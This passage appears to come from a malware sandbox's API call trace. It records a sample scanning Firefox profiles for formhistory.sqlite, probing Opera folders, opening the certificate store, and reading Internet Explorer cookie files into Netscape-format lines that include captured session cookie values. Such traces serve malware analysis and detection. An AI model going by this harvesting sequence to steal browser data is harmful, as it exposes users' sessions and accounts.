(lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.163] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\D\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.163] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.163] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.163] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.163] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.163] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.163] lstrcmpiW (lpString1="07", lpString2=".") returned 1 [0591.164] lstrcmpiW (lpString1="07", lpString2="..") returned 1 [0591.164] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\D") returned 81 [0591.164] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\D\\07\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.164] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.164] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.164] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.164] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.164] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.164] StrStrIW (lpFirst="1F307d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.164] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0 [0591.164] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.164] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 1 [0591.164] lstrcmpiW (lpString1="08", lpString2=".") returned 1 [0591.164] lstrcmpiW (lpString1="08", lpString2="..") returned 1 [0591.164] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\D") returned 81 [0591.164] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\D\\08\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.164] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.165] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.165] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.165] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.165] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 1 [0591.165] StrStrIW (lpFirst="71469d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.165] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.165] lstrcmpiW (lpString1="15", lpString2=".") returned 1 [0591.165] lstrcmpiW (lpString1="15", lpString2="..") returned 1 [0591.165] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\D") returned 81 [0591.165] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\D\\15\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.165] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.165] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.165] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.165] StrStrIW (lpFirst="BF22Ad01", lpSrch="formhistory.sqlite") returned 0x0 [0591.165] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.165] lstrcmpiW (lpString1="FE", lpString2=".") returned 1 [0591.165] lstrcmpiW (lpString1="FE", lpString2="..") returned 1 [0591.165] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\D") returned 81 [0591.165] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\D\\FE\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.165] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.166] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.166] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.166] StrStrIW (lpFirst="A0C36d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.166] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.166] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.166] lstrcmpiW (lpString1="E", lpString2=".") returned 1 [0591.166] lstrcmpiW (lpString1="E", lpString2="..") returned 1 [0591.166] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.166] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\E\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.166] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.166] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.166] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.166] lstrcmpiW (lpString1="17", lpString2=".") returned 1 [0591.166] lstrcmpiW (lpString1="17", lpString2="..") returned 1 [0591.166] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\E") returned 81 [0591.166] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\E\\17\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.167] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.167] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.167] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.167] StrStrIW (lpFirst="D467Fd01", lpSrch="formhistory.sqlite") returned 0x0 [0591.167] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.167] lstrcmpiW (lpString1="45", lpString2=".") returned 1 [0591.167] lstrcmpiW (lpString1="45", lpString2="..") returned 1 [0591.167] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\E") returned 81 [0591.167] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\E\\45\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.167] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.167] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.167] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.167] StrStrIW (lpFirst="C6466d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.167] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.167] lstrcmpiW (lpString1="57", lpString2=".") returned 1 [0591.167] lstrcmpiW (lpString1="57", lpString2="..") returned 1 [0591.167] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\E") returned 81 [0591.167] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\E\\57\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.167] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.167] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.167] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.167] StrStrIW (lpFirst="C6B34d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.168] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.168] lstrcmpiW (lpString1="69", lpString2=".") returned 1 [0591.168] lstrcmpiW (lpString1="69", lpString2="..") returned 1 [0591.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\E") returned 81 [0591.168] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\E\\69\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.168] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.168] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.168] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.168] StrStrIW (lpFirst="885EEd01", lpSrch="formhistory.sqlite") returned 0x0 [0591.168] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.168] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.168] lstrcmpiW (lpString1="F", lpString2=".") returned 1 [0591.168] lstrcmpiW (lpString1="F", lpString2="..") returned 1 [0591.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache") returned 79 [0591.168] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\F\\*.*", lpFindFileData=0x52d69c | out: lpFindFileData=0x52d69c) returned 0x5b9b10 [0591.168] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.168] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.168] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.168] lstrcmpiW (lpString1="23", lpString2=".") returned 1 [0591.168] lstrcmpiW (lpString1="23", lpString2="..") returned 1 [0591.168] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\F") returned 81 [0591.168] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\F\\23\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.169] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.169] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.169] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.169] StrStrIW (lpFirst="7E0FEd01", lpSrch="formhistory.sqlite") returned 0x0 [0591.169] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.169] lstrcmpiW (lpString1="94", lpString2=".") returned 1 [0591.169] lstrcmpiW (lpString1="94", lpString2="..") returned 1 [0591.169] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\F") returned 81 [0591.169] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\Cache\\F\\94\\*.*", lpFindFileData=0x52d420 | out: lpFindFileData=0x52d420) returned 0x5b9bd0 [0591.169] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.169] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.169] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.169] StrStrIW (lpFirst="C3F14d01", lpSrch="formhistory.sqlite") returned 0x0 [0591.169] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0591.169] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0591.169] StrStrIW (lpFirst="_CACHE_001_", lpSrch="formhistory.sqlite") returned 0x0 [0591.170] StrStrIW (lpFirst="_CACHE_002_", lpSrch="formhistory.sqlite") returned 0x0 [0591.170] StrStrIW (lpFirst="_CACHE_003_", lpSrch="formhistory.sqlite") returned 0x0 [0591.170] StrStrIW (lpFirst="_CACHE_MAP_", lpSrch="formhistory.sqlite") returned 0x0 [0591.170] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.170] lstrcmpiW (lpString1="jumpListCache", lpString2=".") returned 1 [0591.170] lstrcmpiW (lpString1="jumpListCache", lpString2="..") returned 1 [0591.170] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 73 [0591.170] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\jumpListCache\\*.*", lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0x5b9b50 [0591.180] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.180] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.180] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.180] StrStrIW (lpFirst="0tR2Z1z3LVy3x6Eg_c_5PQ==.ico", lpSrch="formhistory.sqlite") returned 0x0 [0591.180] StrStrIW (lpFirst="q2iyO6SZoS7rh3SnwLJY8w==.ico", lpSrch="formhistory.sqlite") returned 0x0 [0591.180] StrStrIW (lpFirst="zowEU1iSFqZ83bUChPv+jQ==.ico", lpSrch="formhistory.sqlite") returned 0x0 [0591.180] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.181] lstrcmpiW (lpString1="OfflineCache", lpString2=".") returned 1 [0591.181] lstrcmpiW (lpString1="OfflineCache", lpString2="..") returned 1 [0591.181] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 73 [0591.181] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\OfflineCache\\*.*", lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0x5b9b50 [0591.181] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.181] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.181] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.181] StrStrIW (lpFirst="index.sqlite", lpSrch="formhistory.sqlite") returned 0x0 [0591.181] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.181] lstrcmpiW (lpString1="safebrowsing", lpString2=".") returned 1 [0591.181] lstrcmpiW (lpString1="safebrowsing", lpString2="..") returned 1 [0591.181] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 73 [0591.181] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\safebrowsing\\*.*", lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0x5b9b50 [0591.182] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.182] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.182] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.182] StrStrIW (lpFirst="test-malware-simple.cache", lpSrch="formhistory.sqlite") returned 0x0 [0591.182] StrStrIW (lpFirst="test-malware-simple.pset", lpSrch="formhistory.sqlite") returned 0x0 [0591.182] StrStrIW (lpFirst="test-malware-simple.sbstore", lpSrch="formhistory.sqlite") returned 0x0 [0591.182] StrStrIW (lpFirst="test-phish-simple.cache", lpSrch="formhistory.sqlite") returned 0x0 [0591.182] StrStrIW (lpFirst="test-phish-simple.pset", lpSrch="formhistory.sqlite") returned 0x0 [0591.182] StrStrIW (lpFirst="test-phish-simple.sbstore", lpSrch="formhistory.sqlite") returned 0x0 [0591.182] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.183] lstrcmpiW (lpString1="startupCache", lpString2=".") returned 1 [0591.183] lstrcmpiW (lpString1="startupCache", lpString2="..") returned 1 [0591.183] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 73 [0591.183] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\startupCache\\*.*", lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0x5b9b50 [0591.183] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.183] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.183] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.183] StrStrIW (lpFirst="startupCache.4.little", lpSrch="formhistory.sqlite") returned 0x0 [0591.183] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.183] lstrcmpiW (lpString1="thumbnails", lpString2=".") returned 1 [0591.183] lstrcmpiW (lpString1="thumbnails", lpString2="..") returned 1 [0591.183] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 73 [0591.183] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\thumbnails\\*.*", lpFindFileData=0x52d918 | out: lpFindFileData=0x52d918) returned 0x5b9b50 [0591.194] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.194] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.194] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.194] StrStrIW (lpFirst="4cc87c1409819bf06f42b782d4902b2f.png", lpSrch="formhistory.sqlite") returned 0x0 [0591.194] StrStrIW (lpFirst="ab68b23ba499a12eeb8774a7c0b258f3.png", lpSrch="formhistory.sqlite") returned 0x0 [0591.194] StrStrIW (lpFirst="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpSrch="formhistory.sqlite") returned 0x0 [0591.194] StrStrIW (lpFirst="cda93a6bd681b5f6eaf29ea686e2b6f1.png", lpSrch="formhistory.sqlite") returned 0x0 [0591.194] StrStrIW (lpFirst="ce8c0453589216a67cddb50284fbfe8d.png", lpSrch="formhistory.sqlite") returned 0x0 [0591.194] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.195] StrStrIW (lpFirst="_CACHE_CLEAN_", lpSrch="formhistory.sqlite") returned 0x0 [0591.195] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.195] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0591.195] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0591.195] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x2ee3038 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0591.195] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Opera Software\\*.*", lpFindFileData=0x52e0b0 | out: lpFindFileData=0x52e0b0) returned 0xffffffff [0591.195] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x2ee3038 | out: pszPath="C:\\ProgramData") returned 0x0 [0591.195] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Opera Software\\*.*", lpFindFileData=0x52e09c | out: lpFindFileData=0x52e09c) returned 0xffffffff [0591.195] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2ee3038 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0591.195] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Opera Software\\*.*", lpFindFileData=0x52e088 | out: lpFindFileData=0x52e088) returned 0xffffffff [0591.195] CertOpenSystemStoreW (hProv=0x0, szSubsystemProtocol="MY") returned 0x5c10e0 [0591.197] CertEnumCertificatesInStore (hCertStore=0x5c10e0, pPrevCertContext=0x0) returned 0x0 [0591.197] CertCloseStore (hCertStore=0x5c10e0, dwFlags=0x0) returned 1 [0591.197] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0x52e108 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 0x0 [0591.197] PathCombineW (in: pszDest=0x52dc78, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*" [0591.197] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 0x57d1e0 [0591.197] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.197] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.197] PathMatchSpecW (pszFile="aetadzjz@g.live[1].txt", pszSpec="*.txt") returned 1 [0591.197] PathCombineW (in: pszDest=0x52da58, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", pszFile="aetadzjz@g.live[1].txt" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\aetadzjz@g.live[1].txt") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\aetadzjz@g.live[1].txt" [0591.197] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\aetadzjz@g.live[1].txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\aetadzjz@g.live[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0591.198] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x52d9e8 | out: lpFileSize=0x52d9e8*=64) returned 1 [0591.198] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x450000 [0591.198] ReadFile (in: hFile=0x664, lpBuffer=0x450000, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x52da00, lpOverlapped=0x0 | out: lpBuffer=0x450000*, lpNumberOfBytesRead=0x52da00*=0x40, lpOverlapped=0x0) returned 1 [0591.199] atoi (_Str="1536") returned 1536 [0591.199] atoi (_Str="2609193856") returned -1685773440 [0591.199] atoi (_Str="30640264") returned 30640264 [0591.199] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="g.live.com\x09TRUE\x09/\x09FALSE\x091515419843\x09MR\x090\r\n\r\n") returned 43 [0591.199] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.199] PathMatchSpecW (pszFile="aetadzjz@google[1].txt", pszSpec="*.txt") returned 1 [0591.199] PathCombineW (in: pszDest=0x52da58, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", pszFile="aetadzjz@google[1].txt" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\aetadzjz@google[1].txt") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\aetadzjz@google[1].txt" [0591.199] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\aetadzjz@google[1].txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\aetadzjz@google[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0591.199] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x52d9e8 | out: lpFileSize=0x52d9e8*=278) returned 1 [0591.199] VirtualAlloc (lpAddress=0x0, dwSize=0x116, flAllocationType=0x3000, flProtect=0x4) returned 0x450000 [0591.199] ReadFile (in: hFile=0x664, lpBuffer=0x450000, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x52da00, lpOverlapped=0x0 | out: lpBuffer=0x450000*, lpNumberOfBytesRead=0x52da00*=0x116, lpOverlapped=0x0) returned 1 [0591.200] atoi (_Str="9216") returned 9216 [0591.200] atoi (_Str="1797679488") returned 1797679488 [0591.200] atoi (_Str="30677522") returned 30677522 [0591.200] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="google.de\x09TRUE\x09/\x09FALSE\x091531421951\x09NID\x09121=qUkVUjvSmyfrpNll2XVQtNY-Brp7FVLidiS_27pGKWcOmhFv4aWSgdSdFnBO5idPH4Uru2AjwP9foEa3m6Scmru0npSAMQh8TIx7pG03-NmE4H0CMAQq0atJXT1Yu32bZim-woY\r\n\r\n") returned 181 [0591.200] atoi (_Str="1024") returned 1024 [0591.200] atoi (_Str="301115776") returned 301115776 [0591.200] atoi (_Str="30646744") returned 30646744 [0591.200] wvnsprintfA (in: pszDest=0x52c9d4, cchDest=4096, pszFmt="%s\x09TRUE\x09%s\x09%s\x09%I64u\x09%s\x09%s\r\n\r\n", arglist=0x52c9b8 | out: pszDest="google.de\x09TRUE\x09/\x09FALSE\x091518202751\x091P_JAR\x092018-01-10-18\r\n\r\n") returned 58 [0591.200] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52de80 | out: lpFindFileData=0x52de80) returned 1 [0591.200] PathMatchSpecW (pszFile="aetadzjz@live[1].txt", pszSpec="*.txt") returned 1 [0591.200] PathCombineW (in: pszDest=0x52da58, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", pszFile="aetadzjz@live[1].txt" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\aetadzjz@live[1].txt") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\aetadzjz@live[1].txt" [0591.200] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\aetadzjz@live[1].txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\aetadzjz@live[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x664 [0591.200] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x52d9e8 | out: lpFileSize=0x52d9e8*=95) returned 1 [0591.200] VirtualAlloc (lpAddress=0x0, dwSize=0x5f, flAllocationType=0x3000, flProtect=0x4) returned 0x450000 [0591.201] ReadFile (in: hFile=0x664, lpBuffer=0x450000, nNumberOfBytesToRead=0x5f, lpNumberOfBytesRead=0x52da00, lpOverlapped=0x0 | out: lpBuffer=0x450000*, lpNumberOfBytesRead=0x52da00*=0x5f, lpOverlapped=0x0) returned 1 [0591.201] atoi (_Str="1536") returned 1536 [0591.201] atoi (_Str="1715774336") returned 1715774336 [0591.201] atoi (_Str="30682509") returned 30682509 [0591.201] wvnsprintfA 